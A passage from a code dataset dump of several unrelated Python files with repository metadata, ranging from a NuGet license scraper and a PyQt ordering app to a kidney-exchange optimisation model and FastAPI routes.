license_re = re.compile(r'(.*?)<', re.S)\r\n\r\n def __init__(self, verbose):\r\n super().__init__(verbose=verbose)\r\n self.licenses = []\r\n\r\n def process_nuget_package(self, repo_name, path):\r\n self.print_if_verbose(f'Processing NuGet package dependency file [{path}]')\r\n with open(path, 'r', encoding='utf-8-sig') as file:\r\n content = file.read()\r\n root = BeautifulSoup(content, 'xml')\r\n for element in root.findAll('package'):\r\n name = element['id']\r\n version = element['version']\r\n license = self.retrieve_license(name)\r\n self.dependencies.append(self.build_dependency(repo_name, f'nuget', name, version, license))\r\n\r\n def process_nuget_packages(self, repo_name, path):\r\n for filename in glob.iglob(f'{path}/**/packages.config', recursive=True):\r\n self.process_nuget_package(repo_name, filename)\r\n return self\r\n\r\n def retrieve_license(self, name):\r\n if name == '':\r\n return ''\r\n\r\n matches = list(filter(lambda l: l['name'] == name, self.licenses))\r\n if len(matches) > 0:\r\n return matches[0]['license']\r\n\r\n url = f'https://www.nuget.org/packages/{name}'\r\n response = requests.get(url)\r\n content = response.text\r\n matches = self.license_re.findall(content)\r\n if(len(matches)) > 0:\r\n license = matches[0][1].strip()\r\n link = matches[0][0]\r\n license = f'{license} ({link})'\r\n else:\r\n license = ''\r\n self.licenses.append({'name': name, 'license': license})\r\n return license\r\n", "repo_name": "tobiasb/repository-dependency-collector", "sub_path": "nuGetPackageDependencyCollector.py", "file_name": "nuGetPackageDependencyCollector.py", "file_ext": "py", "file_size_in_byte": 1995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "dependencyCollectorBase.DependencyCollectorBase", "line_number": 9, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 10, "usage_type": "call"}, {"api_name": "re.S", "line_number": 10, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 20, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 28, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "21197607056", "text": "import sys\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtGui import QPixmap, QPalette, QIcon\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTabWidget, QVBoxLayout, QHBoxLayout, QPushButton, QTextEdit, QLabel, \\\n QSizePolicy, QHeaderView, QMessageBox, QBoxLayout\nfrom qfluentwidgets import PushButton, LineEdit, TextEdit, ComboBox, InfoBar, InfoBarPosition, MessageBox\n\nfrom cust.dish_widget import MenuWidget\nfrom cust.my_info import My_info\n\nclass MainWindow(QWidget):\n def __init__(self,cust):\n super().__init__()\n self.cust = cust\n self.initUI()\n def initUI(self):\n # 创建窗口布局\n main_layout = QVBoxLayout()\n tab_layout = QHBoxLayout()\n\n #设置icon\n self.setWindowIcon(QIcon('C:/Users/User\\Desktop\\计算机软件综合实验\\计算机软件综合实验/navigation/resource/t.png'))\n # 创建选项卡\n tab_widget = QTabWidget()\n #设置选项卡圆角\n tab_widget.setStyleSheet(\"QTabBar::tab{width:100px;height:50px;font-size:20px;font-family:'Microsoft YaHei', sans-serif;padding:5px;background-color:rgba(255,255,255,0.3);border-radius: 0px;}\"\n \"QTabBar::tab:hover{background-color:rgba(255,255,255,0.4);padding:5px;font-size:20px;font-family:'Microsoft YaHei', sans-serif;border-radius: 0px;}\"\n \"QTabBar::tab:selected{background-color:rgba(255,255,255,0.6);padding:5px;font-size:20px;font-family:'Microsoft YaHei', sans-serif;blur:10px;border-radius: 0px;}\"\n \"QTabWidget::pane{border:0px solid white;background-color:transparent;}\"\n \"QTabWidget::tab-bar{alignment:center;radius:0px;}\"\n \"QTabWidget::tab-bar{background-color:transparent;}\"\n \"QTabWidget::tab-bar{border:0px solid white;}\"\n \"QTabWidget::tab-bar{margin-left:100px;margin-right:100px;}\"\n \"QTabWidget::tab-bar{margin-top:20px;}\"\n \"QTabWidget::tab-bar{margin-bottom:20px;}\"\n )\n my_tab = QWidget()\n my_tab.setStyleSheet(\"background-color: qlineargradient(x1:0, y1:1, x2:1, y2:0,stop:0 rgba(172, 16, 105,240),stop:0.5 rgba(35, 90, 192,240), stop:1 rgba(0, 211, 196,240));\\n\")\n order_tab = QWidget()\n\n # 创建“我的”界面的部件\n\n my_layout = QVBoxLayout()\n my_info = My_info(self.cust)\n #背景透明\n my_info.setStyleSheet(\"background-color:transparent\")\n my_layout.addWidget(my_info)\n\n my_tab.setLayout(my_layout)\n\n\n # 创建“点餐”界面的部件\n self.scroll_area = MenuWidget()\n self.scroll_area.setStyleSheet(\"background-color:transparent;border-radius: 5px;\")\n order_layout = QVBoxLayout()\n order_layout.addWidget(self.scroll_area)\n #圆角\n order_tab.setLayout(order_layout)\n self.xia_dan = PushButton(\"下单\")\n self.xia_dan.clicked.connect(self.place_order)\n order_layout.addWidget(self.xia_dan)\n\n # 将选项卡添加到选项卡部件中\n tab_widget.addTab(my_tab, \"我的\")\n tab_widget.setCurrentIndex(1)\n tab_widget.addTab(order_tab, \"点餐\")\n\n # 将选项卡部件添加到主布局中\n tab_layout.addWidget(tab_widget)\n # 圆角\n tab_layout.setContentsMargins(10, 10, 10, 10)\n main_layout.addLayout(tab_layout)\n\n # 设置主窗口布局\n self.setLayout(main_layout)\n self.setStyleSheet \\\n (\"background-color: qlineargradient(x1:0, y1:1, x2:1, y2:0,stop:0 rgba(172, 16, 105,240),stop:0.5 rgba(35, 90, 192,240), stop:1 rgba(0, 211, 196,240));\\n\"\n \"blur: 10px;\\n\")\n self.setGeometry(600, 200, 600, 800)\n self.setWindowTitle('点点点点点餐吧')\n self.show()\n\n def place_order(self):\n # 执行下单逻辑\n #todo 下单逻辑的实现\n len = self.scroll_area.order(self.cust[0])\n if len > 0:\n InfoBar.success(\n title='成功',\n content=f\"您的商品已下单成功!\",\n orient=QtCore.Qt.Horizontal,\n isClosable=True,\n position=InfoBarPosition.TOP,\n duration=1500, # won't disappear automatically\n parent=self,\n\n )\n #一个付款二维码\n #todo 付款二维码的实现\n # 创建一个QMessageBox\n msg_box = QMessageBox()\n #去除按钮\n msg_box.setStandardButtons(QMessageBox.NoButton)\n # 设置提示文本和图标\n\n\n # 添加QLabel作为自定义控件\n label = QLabel()\n label.setPixmap(QPixmap(\"../cust/img/qrcode.jpg\").scaledToWidth(300))\n widget = QWidget()\n #垂直布局\n vlayout = QVBoxLayout()\n vlayout.addWidget(label)\n paybuttom = PushButton(\"我已付款\")\n vlayout.addWidget(paybuttom)\n #设置按钮的点击退出窗口\n paybuttom.clicked.connect(msg_box.hide)\n widget.setLayout(vlayout)\n msg_box.layout().addWidget(widget)\n #设置标题\n msg_box.setWindowTitle(\"付款\")\n # 显示QMessageBox\n msg_box.exec_()\n else:\n #弹出窗口\n w = MessageBox(\"提示\",\"什么都没选呢!\",self)\n w.exec_()\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow()\n sys.exit(app.exec_())\n", "repo_name": "1EM0NS/CS_Designer", "sub_path": "cust/cust_inter.py", "file_name": "cust_inter.py", "file_ext": "py", "file_size_in_byte": 5703, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 12, "usage_type": "name"}, {"api_name": "cust.dish_widget", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTabWidget", "line_number": 25, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 44, "usage_type": "call"}, {"api_name": "cust.my_info.My_info", "line_number": 45, "usage_type": "call"}, {"api_name": "cust.dish_widget.MenuWidget", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 56, "usage_type": "call"}, {"api_name": "qfluentwidgets.PushButton", "line_number": 60, "usage_type": "call"}, {"api_name": "qfluentwidgets.InfoBar.success", "line_number": 89, "usage_type": "call"}, {"api_name": "qfluentwidgets.InfoBar", "line_number": 89, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 92, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 92, "usage_type": "name"}, {"api_name": "qfluentwidgets.InfoBarPosition.TOP", "line_number": 94, "usage_type": "attribute"}, {"api_name": "qfluentwidgets.InfoBarPosition", "line_number": 94, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 102, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.NoButton", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 113, "usage_type": "call"}, {"api_name": "qfluentwidgets.PushButton", "line_number": 115, "usage_type": "call"}, {"api_name": "qfluentwidgets.MessageBox", "line_number": 127, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 130, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 130, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "29353514899", "text": "from pypinyin import lazy_pinyin\r\nfrom TrieTree import TrieTree\r\n\r\n\r\ndef is_Chinese(word):\r\n\r\n for ch in word:\r\n\r\n if '\\u4e00' <= ch <= '\\u9fff':\r\n\r\n return True\r\n\r\n return False\r\n\r\n\r\n# 将文字和拼音构成词典\r\n# 拼音 -- {字 - fre}\r\ndef pinyinDict(input):\r\n str = []\r\n tree = TrieTree('tree')\r\n output = {}\r\n for i in range(len(input)):\r\n if is_Chinese(input[i]):\r\n\r\n pinyin = lazy_pinyin(input[i])[0]\r\n str += pinyin\r\n if pinyin not in output:\r\n output[pinyin] = {}\r\n tree.insert(pinyin)\r\n if input[i][0] not in output[pinyin]:\r\n output[pinyin][input[i][0]] = 0\r\n output[pinyin][input[i][0]] += 1\r\n for k in output:\r\n sum = 0\r\n for kk in output[k]:\r\n sum += output[k][kk]\r\n for kk in output[k]:\r\n output[k][kk] /= sum\r\n # print(str)\r\n return output, tree\r\n\r\n\r\n'''\r\nx = [\"我\", \"去\", \"上\", \"学\"]\r\nprint(pinyinDict(x))\r\n'''\r\n", "repo_name": "huangliu0909/Pinyin-Chinese-character-conversion", "sub_path": "PinyinDict.py", "file_name": "PinyinDict.py", "file_ext": "py", "file_size_in_byte": 1033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "TrieTree.TrieTree", "line_number": 20, "usage_type": "call"}, {"api_name": "pypinyin.lazy_pinyin", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "9174461062", "text": "# -*- coding:utf-8 -*-\n# Author: xiayouran\n# Email: youran.xia@foxmail.com\n# Datetime: 2023/6/29 10:54\n# Filename: evaluate.py\nimport imageio\nimport numpy as np\nimport multiprocessing as mp\nimport time\n\nfrom clean_watermark import CleanWater\n\n\ndef calculate_time(num_executions=10):\n def decorator(func):\n def wrapper(*args, **kwargs):\n total_time = np.zeros(shape=num_executions)\n for i in range(num_executions):\n start_time = time.time()\n func(*args, **kwargs)\n end_time = time.time()\n execution_time = end_time - start_time\n total_time[i] = execution_time\n print(\"The function [{}] run time: {:.4f} s\".format(func.__name__, execution_time))\n\n print(\"The function [{}] run average time: {:.4f} s\".format(func.__name__, total_time[1:-1].mean()))\n\n return wrapper\n\n return decorator\n\n\n@calculate_time(num_executions=10)\ndef clean_watermark_no_multiprocess():\n img_file = 'imgs/logo-watermark.jpg'\n img_data = imageio.imread(img_file)\n height, width, channel = img_data.shape\n\n if channel == 3:\n fill_color = np.asarray([254, 255, 255], dtype=np.uint8)\n else:\n fill_color = np.asarray([254, 255, 255, 255], dtype=np.uint8)\n\n for i in range(height):\n for j in range(width):\n rgb_data = img_data[i, j]\n if CleanWater.rgb2hex(rgb_data) in CleanWater.watermark_color:\n img_data[i, j] = fill_color\n\n imageio.imsave('imgs/logo.png', img_data)\n\n\n@calculate_time(num_executions=10)\ndef clean_watermark_with_multiprocess():\n img_file = 'imgs/logo-watermark.jpg'\n img_data = imageio.imread(img_file)\n cpu_num = mp.cpu_count()\n img_blocks = CleanWater.split_img(img_data)\n\n pool = mp.Pool(processes=cpu_num)\n img_blocks = pool.map(CleanWater.clean_water, img_blocks)\n img_data_clean = CleanWater.merge_img(img_blocks)\n\n assert img_data_clean.shape == img_data.shape, 'img_data_clean and img_data must have the same shape'\n\n imageio.imsave('imgs/logo.png', img_data_clean)\n\n\nif __name__ == '__main__':\n clean_watermark_no_multiprocess()\n clean_watermark_with_multiprocess()\n", "repo_name": "xiayouran/CleanWatermark", "sub_path": "evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 19, "usage_type": "call"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "imageio.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 42, "usage_type": "attribute"}, {"api_name": "clean_watermark.CleanWater.rgb2hex", "line_number": 47, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater", "line_number": 47, "usage_type": "name"}, {"api_name": "clean_watermark.CleanWater.watermark_color", "line_number": 47, "usage_type": "attribute"}, {"api_name": "imageio.imsave", "line_number": 50, "usage_type": "call"}, {"api_name": "imageio.imread", "line_number": 56, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 57, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater.split_img", "line_number": 58, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater", "line_number": 58, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 60, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater.clean_water", "line_number": 61, "usage_type": "attribute"}, {"api_name": "clean_watermark.CleanWater", "line_number": 61, "usage_type": "name"}, {"api_name": "clean_watermark.CleanWater.merge_img", "line_number": 62, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater", "line_number": 62, "usage_type": "name"}, {"api_name": "imageio.imsave", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "36160274848", "text": "from collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef calD(n):\n return (2*n)%10000\n\n\ndef calS(n):\n return (n+10000-1)%10000\n\n\ndef calL(n):\n return (n%1000)*10+(n//1000)\n\n\ndef calR(n):\n return (n%10)*1000+(n//10)\n\n\ndef bfs(a, b):\n queue = deque()\n queue.append((a, \"\"))\n v = [False for _ in range(10000)] # 0부터 9999까지 등장한 숫자는 True\n v[a] = True\n\n while queue:\n reg, res = queue.popleft() # 레지스터 값, 연산 과정\n if reg == b:\n print(res)\n return\n \n d, s, l, r = calD(reg), calS(reg), calL(reg), calR(reg) # 연산한 값\n if not v[d]:\n queue.append((d, res+\"D\"))\n v[d] = True\n if not v[s]:\n queue.append((s, res+\"S\"))\n v[s] = True\n if not v[l]:\n queue.append((l, res+\"L\"))\n v[l] = True\n if not v[r]:\n queue.append((r, res+\"R\"))\n v[r] = True\n \n\ndef solution():\n A, B = map(int, input().split())\n bfs(A, B)\n \n\nT = int(input())\nfor _ in range(T):\n solution()", "repo_name": "parkyolo/Algorithm", "sub_path": "Baekjoon/DFSBFS/G4_9019_DSLR/solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 1118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.stdin", "line_number": 3, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "1704180430", "text": "import datetime\nfrom signal import alarm\nfrom playsound import playsound\nalarmhour=int(input(\"enter hour\"))\nalarmmin=int(input(\"enter min\"))\nalarmAm=input(\"am/pm:-\")\nif alarmAm==\"pm\":\n alarmhour+=12\nelif alarmAm==\"am\":\n alarmhour-=12\nwhile True:\n if alarmhour==datetime.datetime.now().hour and alarmmin==datetime.datetime.now().minute:\n print(\"playing sound using playsound\")\n print(\"playing....\")\n playsound('/home/shivani/Downloads/ringtone')\n break\n", "repo_name": "shivanikarve/alarm_clock", "sub_path": "alarm clock .py", "file_name": "alarm clock .py", "file_ext": "py", "file_size_in_byte": 490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "datetime.datetime.now", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}, {"api_name": "playsound.playsound", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "985070975", "text": "from typing import List\ndef bubble_sort(A:List[int])->List[int]:\n n=len(A)\n for i in range(n-1):\n for j in range(n-i-1):\n if A[j]>A[j+1]: A[j],A[j+1]=A[j+1],A[j]\n return A\n\nimport random\nA = [random.randint(1,100) for i in range(10)]\nprint(A)\nprint(bubble_sort(A))\n", "repo_name": "kangdaeki/python", "sub_path": "bubble_sort.py", "file_name": "bubble_sort.py", "file_ext": "py", "file_size_in_byte": 292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 2, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "34115656960", "text": "import numpy as np\nimport gurobipy as gp\nfrom gurobipy import GRB\n\nimport sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom KEP_instance import *\nfrom KEP_solution import *\n\n\n\ndef get_cycles(I):\n \"\"\"\n given an instance I, generatate all cycles of size K or less\n makes use of symmetry reduction\n \"\"\"\n\n\n ### create floyd matrix\n floyd = np.full((I.n, I.n), I.n) # initialize matrix\n for i in I.adj_list: \n for j in I.adj_list[i]:\n floyd[i,j] = 1 # set direct neighbors distance to 1\n\n for i in range(I.n):\n for j in range(I.n):\n for k in range(I.n):\n floyd[j,k] = min(floyd[j,k], floyd[j,i] + floyd[i,k])\n\n\n ### find cycles\n C = []\n\n for i in range(I.n): # i = starting node cycle\n curC = [[i]] # current cycle list\n for j in range(1, I.K+1): # j = length current cycle\n newC = [] # new cycle list\n for k in range(len(curC)): # k loops over current cycles (to extend them and possible add them to C)\n for l in range(len(I.adj_list[curC[k][-1]])): # l loops over neighbors\n if I.adj_list[curC[k][-1]][l] >= i:\n if I.adj_list[curC[k][-1]][l] == i: # add if cycle complete\n C.append(curC[k][:])\n else: # else continue exploring\n if floyd[I.adj_list[curC[k][-1]][l],i] <= I.K - j:\n add = True\n for m in range(1, j):\n if curC[k][m] == I.adj_list[curC[k][-1]][l]:\n add = False\n break\n if add:\n newC.append(curC[k][:])\n newC[-1].append(I.adj_list[curC[k][-1]][l])\n curC = newC\n\n return C\n\n\n\ndef CF(I):\n \"\"\"\n given an instance I, solves the KEP using the cycle formulation\n \"\"\"\n\n\n C = get_cycles(I) # determine set of cycles\n\n ### create model\n m = gp.Model(f'KEP cycle formulation {I.filename}')\n gp.setParam('LogFile', 'Logfiles/gurobi_cf.log')\n m.ModelSense = GRB.MAXIMIZE\n\n ### variables\n bin_vars = [] # Create a list to store the binary variables to use them in constraint later\n for i,c in enumerate(C):\n x = m.addVar(vtype = GRB.BINARY, obj = len(c), name = f'x_{i}')\n bin_vars.append(x)\n\n ### constraints\n expressions = [ [] for _ in range(I.n) ] # using expression list avoids having extra if statement: no \"if node in c\" is needed\n for i,c in enumerate(C):\n for node in c:\n expressions[node].append(bin_vars[i])\n for expression in expressions:\n if len(expression) > 1:\n m.addConstr(sum(expression) <= 1)\n\n ### solve model\n # m.write(\"model.lp\")\n # m.setParam('OutputFlag', False)\n m.optimize()\n\n ### make solution class\n solution = KEP_solution(I)\n solution.formulation = 'CF'\n solution.optimality = m.Status == GRB.OPTIMAL\n solution.runtime = m.Runtime\n solution.num_vars = m.NumVars\n solution.num_constrs = m.NumConstrs\n solution.num_nonzero = m.NumNZs\n solution.LB = m.ObjVal # best lower bound (= objective value current solution)\n solution.UB = m.ObjBound # best upper bound\n solution.gap = m.MIPGap # optimality gap\n\n ### determine chosen cycles (for ao feasibility check)\n solution.C = C\n solution.indices = [v.index for v in m.getVars() if v.x > 0.5]\n\n ### solve relaxation\n m_relax = m.relax()\n m_relax.optimize()\n solution.CUB = m_relax.ObjVal # continuous upper bound\n\n return solution\n\n", "repo_name": "pimmie001/MSc-Thesis-BAOR", "sub_path": "CYCLE/CF.py", "file_name": "CF.py", "file_ext": "py", "file_size_in_byte": 3778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 20, "usage_type": "call"}, {"api_name": "gurobipy.Model", "line_number": 68, "usage_type": "call"}, {"api_name": "gurobipy.setParam", "line_number": 69, "usage_type": "call"}, {"api_name": "gurobipy.GRB.MAXIMIZE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "gurobipy.GRB", "line_number": 70, "usage_type": "name"}, {"api_name": "gurobipy.GRB.BINARY", "line_number": 75, "usage_type": "attribute"}, {"api_name": "gurobipy.GRB", "line_number": 75, "usage_type": "name"}, {"api_name": "gurobipy.GRB.OPTIMAL", "line_number": 95, "usage_type": "attribute"}, {"api_name": "gurobipy.GRB", "line_number": 95, "usage_type": "name"}]} +{"seq_id": "7191869374", "text": "from fastapi import APIRouter\nfrom sqlalchemy import insert\n# from models import *\nfrom . import pydantic_models\nimport db\n\n### \n# TO DO\n# добавить проверку вводимых данных\n# staff\n# dog\n# course\n# lesson\n# type_of_lesson\n# adv\n###\n\n\npost_router = APIRouter() \n\n\n@post_router.post(\"/type_of_lesson/\")\nasync def create_type_of_lesson(type_of_lesson: pydantic_models.TypesOfLesson):\n # type_of_lesson.dict() - values to insert\n type_of_lesson = type_of_lesson.dict()\n # del id, so SQLAlchemy won't scold\n del type_of_lesson['id']\n\n # insert into talbe\n query = insert(db.typesOfLesson)\n result = await db.database.execute(query, type_of_lesson)\n return result\n\n\n@post_router.post(\"/dog/\")\nasync def create_dog(dog: pydantic_models.Dogs):\n dog = dog.dict()\n del dog['id']\n\n query = insert(db.dogs)\n result = await db.database.execute(query, dog)\n return result\n\n\n@post_router.post(\"/userdog/\")\nasync def create_userdog(userdog: pydantic_models.UserDog):\n userdog = userdog.dict()\n del userdog['id']\n\n query = insert(db.userDog)\n result = await db.database.execute(query, userdog)\n return result\n\n\n@post_router.post(\"/lesson/\")\nasync def create_lesson(lesson: pydantic_models.Lessons):\n lesson = lesson.dict()\n del lesson['id']\n\n query = insert(db.lessons)\n result = await db.database.execute(query, lesson)\n return result\n\n\n@post_router.post(\"/staff/\")\nasync def create_staff(staff: pydantic_models.Staff):\n staff = staff.dict()\n del staff['id']\n\n query = insert(db.staff)\n result = await db.database.execute(query, staff)\n return result\n\n\n@post_router.post(\"/place/\")\nasync def create_place(place: pydantic_models.Places):\n place = place.dict()\n del place['id']\n\n query = insert(db.places)\n result = await db.database.execute(query, place)\n return result\n\n\n@post_router.post(\"/adv/\")\nasync def create_adv(adv: pydantic_models.Advertisements):\n adv = adv.dict()\n del adv['id']\n\n query = insert(db.advertisements)\n result = await db.database.execute(query, adv)\n return result\n\n\n@post_router.post(\"/user/\")\nasync def create_user(user: pydantic_models.Users):\n user = user.dict()\n del user['id']\n\n query = insert(db.users)\n result = await db.database.execute(query, user)\n return result\n\n\n@post_router.post(\"/course/\")\nasync def create_course(course: pydantic_models.Courses):\n course = course.dict()\n del course['id']\n\n query = insert(db.courses)\n result = await db.database.execute(query, course)\n return result\n\n\n@post_router.post(\"/dogcourse/\")\nasync def create_dogcourse(dogcourse: pydantic_models.DogCourse):\n dogcourse = dogcourse.dict()\n del dogcourse['id']\n\n query = insert(db.dogCourse)\n result = await db.database.execute(query, dogcourse)\n return result\n\n\n@post_router.post(\"/session/\")\nasync def create_session(session: pydantic_models.Sessions):\n session = session.dict()\n del session['id']\n\n query = insert(db.sessions)\n result = await db.database.execute(query, session)\n return result", "repo_name": "Shemyako/crud_server_diploma_rebuild", "sub_path": "app/router/post.py", "file_name": "post.py", "file_ext": "py", "file_size_in_byte": 3101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "fastapi.APIRouter", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.insert", "line_number": 30, "usage_type": "call"}, {"api_name": "db.typesOfLesson", "line_number": 30, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 31, "usage_type": "call"}, {"api_name": "db.database", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 40, "usage_type": "call"}, {"api_name": "db.dogs", "line_number": 40, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 41, "usage_type": "call"}, {"api_name": "db.database", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 50, "usage_type": "call"}, {"api_name": "db.userDog", "line_number": 50, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 51, "usage_type": "call"}, {"api_name": "db.database", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 60, "usage_type": "call"}, {"api_name": "db.lessons", "line_number": 60, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 61, "usage_type": "call"}, {"api_name": "db.database", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 70, "usage_type": "call"}, {"api_name": "db.staff", "line_number": 70, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 71, "usage_type": "call"}, {"api_name": "db.database", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 80, "usage_type": "call"}, {"api_name": "db.places", "line_number": 80, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 81, "usage_type": "call"}, {"api_name": "db.database", "line_number": 81, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 90, "usage_type": "call"}, {"api_name": "db.advertisements", "line_number": 90, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 91, "usage_type": "call"}, {"api_name": "db.database", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 100, "usage_type": "call"}, {"api_name": "db.users", "line_number": 100, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 101, "usage_type": "call"}, {"api_name": "db.database", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 110, "usage_type": "call"}, {"api_name": "db.courses", "line_number": 110, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 111, "usage_type": "call"}, {"api_name": "db.database", "line_number": 111, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 120, "usage_type": "call"}, {"api_name": "db.dogCourse", "line_number": 120, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 121, "usage_type": "call"}, {"api_name": "db.database", "line_number": 121, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 130, "usage_type": "call"}, {"api_name": "db.sessions", "line_number": 130, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 131, "usage_type": "call"}, {"api_name": "db.database", "line_number": 131, "usage_type": "attribute"}]} +{"seq_id": "21829461248", "text": "import requests\nfrom flask import session\nfrom sqlalchemy import Column, Integer, String, JSON, ForeignKey\nfrom sqlalchemy.ext.associationproxy import association_proxy\nfrom sqlalchemy.orm import relationship, make_transient\n\nfrom python_utils.config import server_config\nfrom python_utils.flask_sqlalchemy_base import db, ParametrizedMixin, AuditMixin, JsonDeSerMixin\n\n\nclass Agent(db.Model, ParametrizedMixin, AuditMixin, JsonDeSerMixin):\n __tablename__ = 'agent'\n __table_args__ = {'schema': 'illusionist'}\n\n id = Column(Integer, autoincrement=True, primary_key=True)\n name = Column(String(200))\n description = Column(String(1000))\n editing_by = Column(String(128), nullable=True, default=None)\n app_id = Column(Integer, ForeignKey(\"admin_console.app.id\"))\n settings = Column(JSON)\n state = Column(String)\n bots = association_proxy('agent_bots', 'bot')\n services = relationship(\"Service\")\n\n def __init__(self, name='', description='', editing_by={}, app_id=0, params={}, settings={}, state='draft', **kwargs):\n self.name = name\n self.description = description\n self.editing_by = editing_by\n self.app_id 